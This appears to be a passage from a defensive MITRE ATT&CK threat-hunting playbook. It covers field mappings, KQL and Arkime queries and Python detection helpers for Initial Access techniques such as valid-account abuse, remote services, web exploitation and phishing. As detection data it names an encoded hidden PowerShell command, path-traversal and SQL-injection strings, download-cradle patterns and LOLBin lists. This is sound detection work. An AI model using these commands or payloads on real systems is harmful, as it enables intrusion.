Start Here
Use this portable playbook as a field reference: pick a hunt path, confirm you have the required telemetry, run the relevant queries, then pivot with the checklist inside each card.

1. Pick the question

Start with the scenario, not the tool. If you know the behavior, use Hunt Workflows. If you know the technique, use the ATT&CK tactic list.

2. Check telemetry first

Every card now adds a data-source badge so you can tell if the hunt needs Windows logs, Sysmon/EDR, DNS, proxy, packet capture, Suricata, dashboards, or host access.

Badge types: Windows/Sysmon, Elastic/Kibana, Network/PCAP, Suricata, PowerShell host access.

3. Read the signal badges

Use Signal, Confidence, and Noise to decide what to run first. High signal and low noise cards are better triage starters; high noise cards usually need baselining.

4. Pivot with the checklist

Each card gets an investigation checklist. The checklist does not replace your process, but it gives the next pivots: user, host, parent process, source IP, destination, time window, and related tactics.

Recommended flow

  • Use Search for a T-code, process name, event ID, protocol, or tool name.
  • Use filters to hide everything except the tool you can run right now.
  • Open the matching card, run the most specific query first, then broaden only if needed.
  • Use Dashboards / IDS Rules when you need visual triage or Suricata coverage.
  • Use PowerShell Tools for host-side collection or validation after scope is approved.
Pinned Hunts
Cards you pin are saved locally in this browser. Use this as a quick working set for a hunt, tabletop, or training session.
Coverage Matrix
At-a-glance coverage by ATT&CK tactic and tool type. Counts are generated from the cards in this file when it opens, so the matrix stays aligned as the playbook grows.
Columns: Tactic | Hunt Cards | KQL | Arkime | Wireshark | Suricata | PowerShell | Cloud
(The counts populate when the playbook is opened in a browser.)
Field Mapping / Data Model
Use this as a translation aid when moving a hunt between Elastic ECS, Winlogbeat, raw Sysmon, EDR, and network data. Always validate against the fields your local parser actually writes.
Concept | Elastic ECS | Winlogbeat / Windows | Sysmon raw | Notes
Process name | process.name | process.name or parser-specific field | Image | Normalize paths before comparing process names.
Command line | process.command_line | winlog.event_data.CommandLine | CommandLine | Requires command-line auditing (the "Include command line in process creation events" policy for 4688) or Sysmon/EDR process telemetry.
Parent process | process.parent.name | winlog.event_data.ParentProcessName | ParentImage | Critical for execution, LOLBin, and script abuse hunts.
Event ID | event.code | winlog.event_id | EventID | Some pipelines store this as a string, some as a number; quote it consistently in queries.
User | user.name | winlog.event_data.SubjectUserName / TargetUserName | User | Track both the actor (Subject) and the target account when available.
Host | host.name | winlog.computer_name | Computer | Normalize FQDN, short name, and asset inventory names.
Source IP | source.ip | winlog.event_data.IpAddress | SourceIp | Authentication logs may carry "-" or a workstation name instead of an IP.
Destination IP / port | destination.ip, destination.port | Varies by log source | DestinationIp, DestinationPort | Needed for network, lateral movement, and C2 pivots.
File path | file.path | winlog.event_data.TargetFilename | TargetFilename | Preserve original case for analyst review; compare the normalized path in rules.
Registry path | registry.path | winlog.event_data.TargetObject | TargetObject | Common in persistence and defense-evasion detections.
DNS query | dns.question.name | DNS client/server log fields vary | QueryName | Confirm whether you ingest endpoint DNS (Sysmon event 22), resolver DNS, or both.
URL / domain | url.full, url.domain | Proxy-specific fields | Not usually Sysmon | Proxy, firewall, and EDR schemas differ heavily.
Hash | file.hash.sha256, process.hash.sha256 | winlog.event_data.Hashes | Hashes | Prefer SHA256 where available; the Sysmon Hashes field is a multi-hash string (SHA256=...,MD5=...) that must be split before matching.
Cloud actor | user.name, cloud.account.id | N/A | N/A | CloudTrail, Entra ID (Azure AD), and M365 use different identity object names.

Analyst note: this page is intentionally a mapping aid, not a schema guarantee. Before operationalizing a card, confirm exact field names, data type, parser version, and retention window in your SIEM.
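As an added example (not code from the original playbook), the following Python normalizes process-creation events from the three schemas in the table above onto the ECS-style keys the cards query, then runs one parent/child rule across all of them. The field names come from the mapping table; the three sample events are constructed, and the code assumes flat dotted keys (Kibana exports nested JSON, so flatten first if needed).

```python
import ntpath

# Parents that should not be launching shells: web server daemons and Office apps
# (the same pairing the T1190 and T1566 cards later in the playbook look for).
RISKY_PARENTS = {"w3wp.exe", "httpd.exe", "nginx.exe", "winword.exe", "excel.exe",
                 "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path: C:\\Windows\\cmd.exe -> cmd.exe."""
    return ntpath.basename(path.replace("/", "\\")).lower() if path else ""


def _short_host(name: str) -> str:
    """Short host name, lower-cased, so ECS host.name and raw Sysmon Computer compare equal."""
    return name.split(".")[0].lower() if name else ""


def normalize(event: dict) -> dict:
    """Map one flat event (dotted keys) onto the ECS-style keys used by the hunt cards."""
    if "winlog.event_id" in event:                     # Winlogbeat shape
        data = {k[len("winlog.event_data."):]: v for k, v in event.items()
                if k.startswith("winlog.event_data.")}
        return {
            "event.code": str(event["winlog.event_id"]),
            "host.name": _short_host(event.get("winlog.computer_name", "")),
            # Security 4688 writes NewProcessName/ParentProcessName; Sysmon via Winlogbeat writes Image/ParentImage
            "process.name": _basename(data.get("NewProcessName") or data.get("Image", "")),
            "process.parent.name": _basename(data.get("ParentProcessName") or data.get("ParentImage", "")),
            "process.command_line": data.get("CommandLine", ""),
        }
    if "EventID" in event:                             # raw Sysmon shape
        return {
            "event.code": str(event["EventID"]),
            "host.name": _short_host(event.get("Computer", "")),
            "process.name": _basename(event.get("Image", "")),
            "process.parent.name": _basename(event.get("ParentImage", "")),
            "process.command_line": event.get("CommandLine", ""),
        }
    return {                                           # already ECS
        "event.code": str(event.get("event.code", "")),
        "host.name": _short_host(event.get("host.name", "")),
        "process.name": _basename(event.get("process.name", "")),
        "process.parent.name": _basename(event.get("process.parent.name", "")),
        "process.command_line": event.get("process.command_line", ""),
    }


def suspicious_spawns(events) -> list:
    """Run one parent/child rule over events of any schema; returns (host, parent, child) tuples."""
    hits = []
    for raw in events:
        ev = normalize(raw)
        if ev["process.parent.name"] in RISKY_PARENTS and ev["process.name"] in SHELLS:
            hits.append((ev["host.name"], ev["process.parent.name"], ev["process.name"]))
    return hits


# Constructed sample events, one per schema (not real telemetry).
SAMPLE_EVENTS = [
    {"event.code": "1", "host.name": "WEB01.corp.example",
     "process.parent.name": "w3wp.exe", "process.name": "cmd.exe",
     "process.command_line": "cmd.exe /c whoami"},
    {"winlog.event_id": 4688, "winlog.computer_name": "ws17.corp.example",
     "winlog.event_data.NewProcessName": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "winlog.event_data.ParentProcessName": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "winlog.event_data.CommandLine": "powershell -nop -w hidden -enc SQBFAFgA"},
    {"EventID": 1, "Computer": "ws22", "Image": "C:\\Windows\\explorer.exe",
     "ParentImage": "C:\\Windows\\System32\\userinit.exe", "CommandLine": "explorer.exe"},
]

if __name__ == "__main__":
    for hit in suspicious_spawns(SAMPLE_EVENTS):
        print("suspicious spawn:", hit)
```

The point of the normalization step is that a rule written once against the ECS keys fires on the 4688 event and the raw Sysmon event alike; without it, the same hunt has to be rewritten three times and the copies drift.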

Placeholder Legend
Common placeholders used inside the playbook queries. Replace these with approved values from your environment before running or sharing a query.
Placeholder | Replace with
<MP IPs> | Mission partner / internal IP ranges.
<legit MP accounts> | Approved admin/service accounts.
<target range> | Approved CIDR/range.
<baseline> | Known-good values from your environment.
<admin hosts> | Jump boxes, management servers, SOC-approved hosts.

Analyst note: do not run placeholder values literally. Confirm scope, authorization, and local field names before using the query in a production SIEM or packet tool.

Incident Notes
Local-only working notes for whoever opens this file. Notes are auto-saved in the browser and can be exported as a text file.
Handling warning: Do not store classified information, credentials, PII, customer-sensitive data, or restricted case details in local notes. Export approved notes and clear this page after use.
MITRE ATT&CK Threat Hunting Playbook
Created by Justin McGee Threat Hunting | Detection Engineering | MITRE ATT&CK justin-mcgee
This playbook provides detection logic, hunting queries, field workflows, and adversary context based on the MITRE ATT&CK Enterprise Framework. Start with the guide pages, search for a T-code/process/event ID, or open a tactic tile below. Tool filters live inside the Tactics tab so they only appear where they apply.

Initial Access

TA0001

Techniques to gain a foothold into your network: phishing, exploiting public apps, valid accounts, removable media.

14 hunt cards

Execution

TA0002

Techniques for running malicious code: PowerShell, WMI, scheduled tasks, scripting interpreters.

23 hunt cards

Persistence

TA0003

Maintaining a foothold across reboots: registry run keys, scheduled tasks, web shells, BITS jobs.

26 hunt cards

Privilege Escalation

TA0004

Gaining higher-level permissions: UAC bypass, process injection, AppInit DLLs, shortcut modification.

14 hunt cards

Defense Evasion

TA0005

Avoiding detection: obfuscation, log clearing, masquerading, disabling security tools, rundll32.

53 hunt cards

Credential Access

TA0006

Stealing credentials: LSASS dumping, NTDS, brute force, credential stuffing, password stores.

19 hunt cards

Discovery

TA0007

Mapping the environment: network scanning, account enumeration, system info, share discovery.

36 hunt cards

Lateral Movement

TA0008

Moving through the network: RDP, SSH, WMI, pass-the-hash, internal spearphishing.

12 hunt cards

Collection

TA0009

Gathering data: email collection, screen capture, clipboard, staged data, archive utilities.

22 hunt cards

Command & Control

TA0011

C2 communication: DNS tunneling, protocol tunneling, encrypted channels, web services.

26 hunt cards

Exfiltration

TA0010

Stealing data out: over the C2 channel, alternative protocols, USB exfiltration.

9 hunt cards

Impact

TA0040

Disruption and destruction: denial of service, system shutdown, data destruction.

14 hunt cards
Quick Hunt Workflows
Scenario-first paths for common investigations. These buttons jump into the existing technique cards without changing any of the detection logic.

Initial Compromise Hunt

Use when the first lead is a suspicious login, phishing report, web exploit, or unknown first host.

  1. Check account abuse and phishing indicators.
  2. Pivot to execution and payload transfer.
  3. Review supporting dashboards or IDS hits.

PowerShell Abuse Hunt

Use when you see encoded commands, download cradles, unusual parents, remoting, or suspicious script block logs.

  1. Start with PowerShell execution.
  2. Pivot to WMI, scheduled tasking, and evasion.
  3. Use host tools only after scope is approved.

Credential Theft Hunt

Use when there are LSASS access alerts, NTDS activity, password spraying, suspicious auth, or possible keylogging.

  1. Start with dumping and brute force.
  2. Check password stores and unsecured credentials.
  3. Pivot into lateral movement if credentials were used.

Lateral Movement Hunt

Use when one host touches many internal systems, admin shares, remote services, SMB, WinRM, RDP, or PsExec-like behavior.

  1. Identify source host, target host, and account.
  2. Check remote services and tool transfer.
  3. Confirm whether credentials were newly used elsewhere.
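The three steps above, as an added example that is not part of the original playbook: the Python below takes 4624 records with network (type 3) or RDP (type 10) logons, builds the source/target/account view from step 1, flags a source that fans out to many targets, and then (step 3) reports account/host pairs that do not appear in a known-good baseline of where each account normally logs on. The fan-out threshold, the baseline, and the sample logons are all assumptions constructed for the example; step 2 (which remote service was used) is the pivot into the T1021 cards and is not modelled here.

```python
from collections import defaultdict

FANOUT_THRESHOLD = 5               # assumed: distinct targets from one source before it is worth a look
REMOTE_LOGON_TYPES = {"3", "10"}   # network and RemoteInteractive (RDP) logons


def source_of(ev: dict) -> str:
    """Best available source for a remote logon: the IP if present, else WorkstationName (Kerberos
    logons often carry "-" in IpAddress)."""
    src = ev.get("source.ip", "-")
    if src not in ("-", "", None):
        return src
    return ev.get("winlog.event_data.WorkstationName", "unknown").lower()


def lateral_movement_summary(events: list, baseline: dict) -> dict:
    """Return sources that touch >= FANOUT_THRESHOLD distinct targets, and (user, host, source)
    triples where an account logged on to a host outside its baseline set."""
    targets_by_source = defaultdict(set)
    accounts_by_source = defaultdict(set)
    new_pairs, seen_pairs = [], set()
    for ev in events:
        if str(ev.get("event.code")) != "4624":
            continue
        if str(ev.get("winlog.event_data.LogonType")) not in REMOTE_LOGON_TYPES:
            continue
        src = source_of(ev)
        user, target = ev["user.name"].lower(), ev["host.name"].lower()
        targets_by_source[src].add(target)
        accounts_by_source[src].add(user)
        if target not in baseline.get(user, set()) and (user, target) not in seen_pairs:
            seen_pairs.add((user, target))
            new_pairs.append((user, target, src))
    fanout = [(src, len(hosts), sorted(hosts), sorted(accounts_by_source[src]))
              for src, hosts in targets_by_source.items() if len(hosts) >= FANOUT_THRESHOLD]
    return {"fanout": sorted(fanout), "new_account_host_pairs": new_pairs}


def _logon(ts, user, host, src, logon_type="3", workstation=""):
    """Build a constructed 4624 record in the flat ECS/Winlogbeat shape used above."""
    return {"@timestamp": ts, "event.code": "4624", "user.name": user, "host.name": host,
            "source.ip": src, "winlog.event_data.LogonType": logon_type,
            "winlog.event_data.WorkstationName": workstation}


# Constructed baseline and sample logons (not real telemetry).
BASELINE = {"jdoe": {"ws17"}, "svc_backup": {"fs01", "fs02"}}
REMOTE_LOGONS = [
    _logon("2024-06-01T09:00:00", "jdoe", "ws17", "-", "10", "LAPTOP-JDOE"),   # normal RDP to own box
    _logon("2024-06-01T09:10:00", "svc_backup", "fs01", "10.1.6.1"),          # in baseline
    _logon("2024-06-01T09:12:00", "jdoe", "fs01", "10.1.5.23"),
    _logon("2024-06-01T09:12:30", "jdoe", "fs02", "10.1.5.23"),
    _logon("2024-06-01T09:13:00", "jdoe", "fs03", "10.1.5.23"),
    _logon("2024-06-01T09:13:20", "jdoe", "dc01", "10.1.5.23"),
    _logon("2024-06-01T09:14:00", "jdoe", "ws40", "10.1.5.23"),
    _logon("2024-06-01T09:14:10", "jdoe", "ws40", "10.1.5.23"),               # repeat, counted once
]

if __name__ == "__main__":
    summary = lateral_movement_summary(REMOTE_LOGONS, BASELINE)
    for src, n, hosts, users in summary["fanout"]:
        print(f"fan-out from {src}: {n} hosts {hosts} using {users}")
    for user, host, src in summary["new_account_host_pairs"]:
        print(f"new account/host pair: {user} -> {host} (from {src})")
```

Run the baseline over a quiet window first; an account that legitimately touches many servers (backup, scanners, SCCM) will otherwise dominate the fan-out list and hide the one interactive user doing the same thing.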

Exfiltration Hunt

Use when there are unusual outbound volumes, archive staging, suspicious HTTP POSTs, cloud uploads, or C2-adjacent transfer.

  1. Check archive/staging behavior.
  2. Pivot to protocol and web service exfiltration.
  3. Correlate endpoint, proxy, DNS, and IDS views.

Ransomware / Impact Hunt

Use when there is encryption, mass file modification, backup tampering, service stopping, shutdown behavior, or destructive actions.

  1. Check impact behavior first.
  2. Pivot to defense evasion and recovery inhibition.
  3. Review account and lateral movement scope.
Initial Access TA0001
Adversaries use Initial Access techniques to gain a foothold in your network. This includes spearphishing, exploiting public-facing web servers, and using valid accounts obtained through credential theft or purchase.
T1078

Valid Accounts

[MITRE]

Why they do it: Adversaries obtain and abuse credentials of existing accounts (local, domain, or cloud). This is highly stealthy because it blends in with legitimate user activity, bypassing access controls without exploiting vulnerabilities.

What to look for: Logins outside of normal business hours, disabled/dormant accounts suddenly authenticating, multiple concurrent logins from the same user, or logins failing MFA prompts repeatedly.

Key Event IDs: 4624 (successful logon; review the logon type). 4625 (failed logon). 4648 (logon using explicit credentials / RunAs). 4672 (special privileges assigned to a new logon, i.e. an admin logon). 4720 (account created). 4778/4779 (RDP or terminal session reconnected/disconnected).

[KQL] Run Elastic (ELK) ML anomaly jobs for rare user/login activity (job names as listed in the playbook; confirm they exist in your stack)
windows_rare_user_runas_event
endpoint_suspicious_login_activity
endpoint_rare_user_type10_remote_login
[KQL] Detect access using valid accounts: key event IDs
event.code: (4624 OR 4625 OR 4648 OR 4672 OR 4720 OR 4724 OR 4776 OR 4778 OR 4779 OR 4798 OR 4799)
[KQL] Dormant/default privileged accounts logging in over the network from outside internal ranges
winlog.event_id: 4624 AND winlog.logon.type: 3 AND user.name: ("Administrator" OR "Guest" OR "DefaultAccount" OR "krbtgt") AND NOT source.ip: ("10.0.0.0/8" OR "172.16.0.0/12" OR "192.168.0.0/16")
Caveat: Winlogbeat's security module writes the numeric logon type in winlog.event_data.LogonType and a descriptive value (e.g. Network) in winlog.logon.type; check which your pipeline populates and adjust the clause. krbtgt never logs on interactively, so any 4624 for it deserves a look regardless of source.
[Info] Also check Persistence, Privilege Escalation, and Defense Evasion for this technique. The xfreerdp client is commonly observed alongside abused valid accounts; search for:
xfreerdp
See also: T1078.003 (Local Accounts), T1078.004 (Cloud Accounts)
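Two of the "what to look for" items above (default privileged accounts authenticating over the network from outside internal ranges, and dormant accounts suddenly authenticating) as an added example in Python, not code from the original playbook. It does the CIDR exclusion with ipaddress rather than string matching, tolerates the "-" that Kerberos logons put in IpAddress, and tracks each account's last successful logon so a long gap can be flagged; the 90-day dormancy threshold and the sample 4624 records are assumptions constructed for the example.

```python
import ipaddress
from datetime import datetime, timedelta

INTERNAL_RANGES = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
DEFAULT_PRIVILEGED = {"administrator", "guest", "defaultaccount", "krbtgt"}
DORMANT_AFTER = timedelta(days=90)   # assumed threshold; tune to your environment
NETWORK_LOGON = "3"


def is_internal(ip: str) -> bool:
    """True if ip falls in an internal range. Non-IP values ("-", a workstation name) are not internal."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in INTERNAL_RANGES)


def hunt_valid_accounts(events: list) -> list:
    """Walk 4624 records in time order and return (reason, user, host, source_ip) hits:
    default privileged accounts with a type-3 logon from outside internal ranges, and
    accounts that reappear after more than DORMANT_AFTER of silence."""
    last_seen = {}
    hits = []
    for ev in sorted(events, key=lambda e: e["@timestamp"]):
        if str(ev.get("event.code")) != "4624":
            continue
        ts = datetime.fromisoformat(ev["@timestamp"])
        user = ev["user.name"].lower()
        src = ev.get("source.ip", "-")
        if (user in DEFAULT_PRIVILEGED
                and str(ev.get("winlog.event_data.LogonType")) == NETWORK_LOGON
                and not is_internal(src)):
            hits.append(("default-account-network-logon", user, ev["host.name"], src))
        prev = last_seen.get(user)
        if prev is not None and ts - prev > DORMANT_AFTER:
            hits.append(("dormant-account-reactivated", user, ev["host.name"], src))
        last_seen[user] = ts
    return hits


# Constructed sample 4624/4625 records (not real telemetry).
SAMPLE_LOGONS = [
    {"@timestamp": "2024-01-02T08:01:00", "event.code": "4624", "user.name": "jdoe",
     "host.name": "ws17", "winlog.event_data.LogonType": "2", "source.ip": "-"},
    {"@timestamp": "2024-01-02T08:05:00", "event.code": "4624", "user.name": "svc_backup",
     "host.name": "fs01", "winlog.event_data.LogonType": "3", "source.ip": "10.1.5.23"},
    {"@timestamp": "2024-01-03T08:02:00", "event.code": "4624", "user.name": "jdoe",
     "host.name": "ws17", "winlog.event_data.LogonType": "2", "source.ip": "-"},
    {"@timestamp": "2024-06-01T03:12:00", "event.code": "4624", "user.name": "svc_backup",
     "host.name": "dc01", "winlog.event_data.LogonType": "3", "source.ip": "10.1.5.99"},
    {"@timestamp": "2024-06-01T03:15:00", "event.code": "4624", "user.name": "Administrator",
     "host.name": "dc01", "winlog.event_data.LogonType": "3", "source.ip": "203.0.113.5"},
    {"@timestamp": "2024-06-01T03:16:00", "event.code": "4625", "user.name": "Administrator",
     "host.name": "dc01", "winlog.event_data.LogonType": "3", "source.ip": "203.0.113.5"},
]

if __name__ == "__main__":
    for hit in hunt_valid_accounts(SAMPLE_LOGONS):
        print(*hit)
```

The dormancy check needs history older than the gap you want to detect: if your SIEM retains 30 days, a 90-day gap is invisible and the account simply looks new, which is the retention caveat from the field-mapping page.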
T1078.003

Valid Accounts: Local Accounts

[MITRE]

Why they do it: Adversaries use local accounts (not domain accounts) to authenticate, often avoiding domain-level monitoring and logging.

[KQL] Detect local account creation followed by addition to the local Administrators group (free-text searches; run them in sequence and correlate on host, user, and time)
"net user" AND "add"
"net localgroup" AND "admin"
[KQL] Local account creation via command line or event code
event.code: 4720 OR process.command_line: ("new-localuser" OR ("net user" AND "\/add"))
[PowerShell] Enumerate all local accounts and verify each one is expected
Get-LocalUser
T1133

External Remote Services

[MITRE]

Why they do it: Adversaries leverage external-facing remote services (VPNs, RDP, SSH, Citrix, OWA) to connect to the internal network using stolen or brute-forced credentials. This blends in with legitimate remote work.

What to look for: Logins during unusual hours/days, unusual source IPs, multiple failed attempts followed by success. Also see Persistence.

[Arkime] Review VPN, SSH, RDP, OWA, Citrix traffic, especially during unusual hours (the Arkime field is protocols; the tunnel ports below are mostly UDP)
VPN:   port == [443, 1194, 51820, 500, 4500, 1701] || protocols == [openvpn, ipsec, l2tp, sstp, pptp, ssl, tls]
SSH:   port == 22 || protocols == ssh
RDP:   port == 3389 || protocols == rdp
WinRM: port == [5985, 5986]
[KQL] Successful RDP/SSH from external IPs
event.category: "authentication" AND event.outcome: "success" AND destination.port: (3389 OR 22) AND NOT source.ip: ("10.0.0.0/8" OR "192.168.0.0/16" OR "172.16.0.0/12")
[KQL] Unusual DNS activity related to remote services
event.code: (2 OR 23 OR 26) AND (process.name: *dns* OR process.executable: "\\dns*")
Caveat: in Sysmon, event 22 is the DNS query event; 2, 23 and 26 are file-time-change and file-delete events. Confirm which log source and IDs this query is meant to run against in your pipeline before using it.
[KQL] WinRM connections with abnormal credentials (wsmprovhost.exe is the WinRM host process)
process.name: wsmprovhost.exe AND NOT related.user: (<legit MP accounts>)
*winrm* AND NOT process.name: wsmprovhost.exe
T1190

Exploit Public-Facing Application

[MITRE]

Why they do it: To gain a foothold by exploiting weaknesses in software accessible from the internet (Web Servers, Firewalls, VPN gateways, Exchange Servers).

What to look for: Web server processes spawning shells, excessive HTTP 500 errors, known exploit payloads (Log4j JNDI, SQLi, path traversal) in URI requests or headers.

[KQL] Web server daemons spawning shells (RCE indicator)
process.parent.name: ("w3wp.exe" OR "httpd.exe" OR "nginx.exe" OR "php.exe" OR "php-cgi.exe" OR "tomcat.exe") AND process.name: ("cmd.exe" OR "cscript.exe" OR "powershell.exe" OR "pwsh.exe" OR "powershell_ise.exe" OR "wmic.exe" OR "wscript.exe")
[KQL] Path traversal or SQL injection in web access logs (the status-code clause on its own is noisy; baseline 500s per application before alerting on them)
url.original: (*..%2f* OR *%2e%2e%2f* OR *etc/passwd* OR *UNION+SELECT*) OR http.response.status_code: 500
[KQL] Review RDP logon indicators
event.code: (4624 OR 4634 OR 4647 OR 4778)
-- AND look for: network connections from mstsc.exe, rdpclip.exe, logon type 10
[KQL] Exchange CVE-2021-26858: suspicious file writes by the Unified Messaging service
event.type: "creation" AND process.name: ("UMWorkerProcess.exe" OR "umservice.exe") AND file.extension: ("php" OR "jsp" OR "js" OR "aspx" OR "asmx" OR "asax" OR "cfm" OR "shtml")
[KQL] RDP from the internet to internal IPs (should almost never happen)
event.category: (network or network_traffic) AND network.transport: tcp AND (destination.port: 3389 OR event.dataset: zeek.rdp) AND NOT source.ip: (10.0.0.0/8 OR 172.16.0.0/12 OR 192.168.0.0/16) AND destination.ip: (10.0.0.0/8 OR 172.16.0.0/12 OR 192.168.0.0/16)
[KQL] Commands executed via the WinRM host process (wsmprovhost.exe); for web-shell spawning, use the w3wp.exe/httpd.exe parent query above
event.code: 1 AND process.parent.executable: (*\\wsmprovhost.exe) AND process.executable: (*\\cmd.exe OR *\\sh.exe OR *\\bash.exe OR *\\powershell.exe OR *\\pwsh.exe OR *\\wsl.exe OR *\\schtasks.exe OR *\\certutil.exe OR *\\whoami.exe OR *\\bitsadmin.exe)
[Arkime] Search for VPN/Citrix exploit traffic patterns
protocols == http && http.uri == [*vpn*, *smb.conf*, *.xml*, *.pl*]
[KQL] Same pattern over proxy/web logs
url.path: (*vpns* OR *smb.conf* OR *vpn* OR *.xml* OR *.pl*)
T1200

Hardware Additions

[MITRE]

Why they do it: Adversaries with physical access introduce rogue hardware (USB Rubber Duckies, network taps, rogue APs) to bypass perimeter defenses.

[KQL] New external device recognized by the system: verify it is legitimate
event.code: 6416   -- New external device recognized
event.code: 6421   -- Request to enable a device
event.code: 6422   -- Device enabled
event.code: 6423   -- Device installation forbidden by policy
[Info] Run an nmap/Nessus network scan and compare against the baseline or the mission-partner device list. Run arp -a (may need elevated privileges; it only lists hosts the local machine has recently talked to). If the mission partner uses SolarWinds, request its device discovery results for comparison.
arp -a
nmap -sn <network range>
-- Compare against the authorized device list from the mission partner
T1566

Phishing

[MITRE]

Why they do it: To trick users into executing malicious attachments, clicking links, or providing credentials. Bypasses technical perimeter controls by exploiting human trust.

What to look for: Office apps spawning child processes (macros), emails with dangerous attachment extensions, network traffic to new domains after email activity.

[KQL] Malicious process spawned from Outlook: broad detection
event.action: "Process Create (rule: ProcessCreate)" AND process.parent.name: outlook.exe AND process.name: (Microsoft.Workflow.Compiler.exe OR arp.exe OR atbroker.exe OR bitsadmin.exe OR certutil.exe OR cmd.exe OR cscript.exe OR mshta.exe OR net.exe OR net1.exe OR netsh.exe OR nltest.exe OR ping.exe OR powershell.exe OR pwsh.exe OR reg.exe OR regsvr32.exe OR sc.exe OR schtasks.exe OR systeminfo.exe OR tasklist.exe OR whoami.exe OR wmic.exe OR wscript.exe)
[KQL] Office/PDF spawning suspicious child processes
process.parent.name: ("WINWORD.EXE" OR "EXCEL.EXE" OR "POWERPNT.EXE" OR "OUTLOOK.EXE" OR "AcroRd32.exe" OR "FoxitReader.exe") AND process.name: ("cmd.exe" OR "powershell.exe" OR "wscript.exe" OR "cscript.exe" OR "mshta.exe" OR "rundll32.exe")
[KQL] Any process started by Outlook (broad; baseline before alerting)
event.category: process AND event.type: start AND process.parent.name: "outlook.exe"
[KQL] PDF reader writing then executing an EXE
event.type != "deletion" AND file.extension: "exe" AND process.name: ("AcroRd32.exe" OR "rdrcef.exe" OR "FoxitPhantomPDF.exe" OR "FoxitReader.exe") AND NOT file.name: ("FoxitPhantomPDF.exe" OR "FoxitReader.exe" OR "AcroRd32.exe" OR "rdrcef.exe")
[Arkime] Inbound email traffic with attachments from external sources
ip.src != [<MP IPs>] && ip.dst == [<MP IPs>] && (protocols == smtp || port == 25)
email.fn == EXISTS!
T1566.001

Phishing: Spearphishing Attachment

[MITRE]

What to look for: Emails with suspicious attachment file types, macro-enabled documents, Office Add-Ins loaded from temp/downloads folders.

[Arkime] Query for emails with files attached; review for suspicious attachments
email.fn == EXISTS!
[KQL] .url file access not from Explorer (possible LNK/URL phishing)
event.code: 4663 AND file.extension: "url" AND NOT process.name: "explorer.exe"
[KQL] Office products writing suspicious file extensions (file-create events such as Sysmon 11 name the writing process in process.name)
process.name: (WINWORD.EXE OR EXCEL.EXE OR POWERPNT.EXE OR mspub.exe OR fltldr.exe OR visio.exe) AND file.extension: (exe OR pif OR scr OR iso OR rar OR 7z OR img OR vhd OR js OR vbs OR wsh OR hta OR cpl OR jse OR vbe OR cmd OR dll)
[KQL] Macro-enabled attachment leading to PowerShell downloading a payload (free-text search)
powershell AND "Invoke-WebRequest" AND "-OutFile"
[KQL] High-entropy HTML file written to Downloads/Temp (HTML smuggling; file.Ext.entropy is an Elastic Defend field, so this needs the Elastic agent)
event.action: ("creation" OR "rename") AND file.extension: ("htm" OR "html") AND file.path: ("?:\\Users\\*\\Downloads\\*" OR "?:\\Users\\*\\Content.Outlook\\*" OR "?:\\Users\\*\\AppData\\Local\\Temp\\*") AND ((file.Ext.entropy >= 5 AND file.size >= 150000) OR file.size >= 1000000)
[KQL] PowerShell launched by wscript/cscript (script in an Office document)
event.type: "start" AND process.parent.name: ("cscript.exe" OR "wscript.exe") AND process.name: "powershell.exe"
[KQL] CHM file (compiled HTML) used as a phishing attachment
".chm"
process.name: "hh.exe" AND NOT destination.ip: (<MP IPs>) AND NOT dns.question.name: "localhost"
T1566.002

Phishing: Spearphishing Link

[MITRE]

What to look for: Browsers opening HTML files from temp/downloads folders with high entropy, browsers spawned by Outlook, clicks leading to immediate file downloads.

[KQL] High-entropy HTML written to temp/downloads (HTML smuggling; file.Ext.entropy is an Elastic Defend field)
event.action: ("creation" OR "rename") AND file.extension: ("htm" OR "html") AND file.path: ("?:\\Users\\*\\Downloads\\*" OR "?:\\Users\\*\\Content.Outlook\\*" OR "?:\\Users\\*\\AppData\\Local\\Temp\\*") AND ((file.Ext.entropy >= 5 AND file.size >= 150000) OR file.size >= 1000000)
[KQL] Browser spawned by Outlook: link click indicator
process.name: (iexplore.exe OR msedge.exe OR chrome.exe OR firefox.exe) AND process.command_line: *http* AND process.parent.name: OUTLOOK.EXE
[KQL] Browser opening an HTML file from temp/downloads (a single local file argument is suspicious)
event.action: "start" AND process.name: (chrome.exe OR msedge.exe OR brave.exe OR firefox.exe OR iexplore.exe) AND process.args: ("?:\\Users\\*\\Downloads\\*.htm*" OR "?:\\Users\\*\\Content.Outlook\\*.htm*" OR "?:\\Users\\*\\AppData\\Local\\Temp\\*.htm*")
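The entropy/size rule used by both the T1566.001 and T1566.002 HTML-smuggling queries, as an added example in Python (not code from the original playbook). It implements the Shannon entropy that file.Ext.entropy supplies on Elastic Defend hosts, applies the card's thresholds to a file path and its bytes, and shows two things the query text alone does not: a large plain-text HTML page stays under the entropy bar even though it passes the size bar, and a smuggled payload under 150 KB is missed entirely. The three sample files are constructed in the code.

```python
import base64
import math
import random
from pathlib import PureWindowsPath

# Thresholds from the card: (entropy >= 5 and size >= 150 KB) or size >= 1 MB.
ENTROPY_MIN, SIZE_WITH_ENTROPY, SIZE_ALONE = 5.0, 150_000, 1_000_000
WATCHED_DIRS = ("\\downloads\\", "\\content.outlook\\", "\\appdata\\local\\temp\\")


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or single-valued input, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def html_smuggling_candidate(path: str, content: bytes) -> bool:
    """True when the file is .htm/.html under a user's Downloads, Content.Outlook or local Temp
    directory and meets the entropy/size rule above."""
    p = PureWindowsPath(path)
    if p.suffix.lower() not in (".htm", ".html"):
        return False
    normalized = "\\" + "\\".join(p.parts[1:]).lower() + "\\"    # drop the drive, e.g. C:\
    if not normalized.startswith("\\users\\") or not any(d in normalized for d in WATCHED_DIRS):
        return False
    size = len(content)
    return (size >= SIZE_WITH_ENTROPY and shannon_entropy(content) >= ENTROPY_MIN) or size >= SIZE_ALONE


def _make_samples():
    """Constructed files: a smuggled base64 blob with a download stub, a large plain page, a small blob."""
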